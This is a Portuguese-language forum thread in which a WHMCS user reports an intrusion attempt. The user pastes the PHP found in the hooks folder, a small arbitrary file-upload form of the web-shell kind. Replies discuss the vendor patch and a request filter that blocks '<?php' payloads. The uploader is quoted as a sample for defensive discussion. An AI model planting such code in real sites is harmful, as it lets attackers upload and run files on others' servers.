Ir para conteúdo
  • Cadastre-se

Tentativa de invsão no meu WHMCS

Posts Recomendados

Recebi um codigo diferente hoje, e passou batido pelo arquivo criado no includes/hooks/

<?php echo '<form action=" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; } else { echo '<b>Upload GAGAL !!!</b><br><br>'; } } ?> )

Será que corro algum risco?

Estou usando a versão 5.03 do WHMCS

Valeu!

Não sei se a versão 5 ja vem com o patch de segurança instalado, porém se você ja instalou o patch de segurança anteriormente não corre nenhum risco, pelo menos são que eles alegam.
Link para o comentário
Compartilhar em outros sites

Re

Recebi um codigo diferente hoje, e passou batido pelo arquivo criado no includes/hooks/ '; echo '

'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?> ) Será que corro algum risco? Estou usando a versão 5.03 do WHMCS Valeu!

Realmente não tem problema conforme o @lucasippon informou!

Se quiser bloquear essas tentativas duplique o hooks e na linha 4 altere para

if (strpos($_REQUEST[$checkvar],'<?php')!==false) {

Link para o comentário

Esse script do TIU Edvan é porreta mesmo!

Depois de colocar ele na pasta não tive mais problemas.

E agora vive aparecendo uns ip's banidos na lista, tem até comédinha BR no meio!!!!!!

Valeu Edvan.

Obrigado Edvan!

Na verdade o script não é meu... Foi publicado em http://www.portaldohost.com.br/whmcs/onda-de-ataques-ao-whmcs-o-que-fazer sendo que o original é do http://www.webhostingtalk.com/showpost.php?p=7856656&postcount=68

Eu apenas dei uma incrementada ( bloqueio de IP + notificação/registro ).

Link para o comentário

Estou pensando seriamente em abandonar o WHMCS, embora sei que este esta entre os melhores senão o melhor gerenciador de host, mas infelizmente sua segurança é pífia. Notório que a empresa do WHMCS esta deixando a desejar, pois é inadmissível esta quantidade de problemas que esta ocorrendo em um produto que pagamos para funcionar corretamente.

Espero que não me levem a mal, pois como disse o WHMCS é excelente no quesito funcionalidade entretanto a partir do momento que temos que mudar pastas, mexer em códigos contratar módulos de segurança separados me parece descaso os usuários já que se isso resolve o problema, porque não tem uma versão com estas soluções.

Link para o comentário

Visitante
Este tópico está impedido de receber novos posts.
  • Quem Está Navegando   0 membros estão online

• Nenhum usuário registrado visualizando esta página.
  • Criar Novo...

Informação Importante

Concorda com os nossos termos?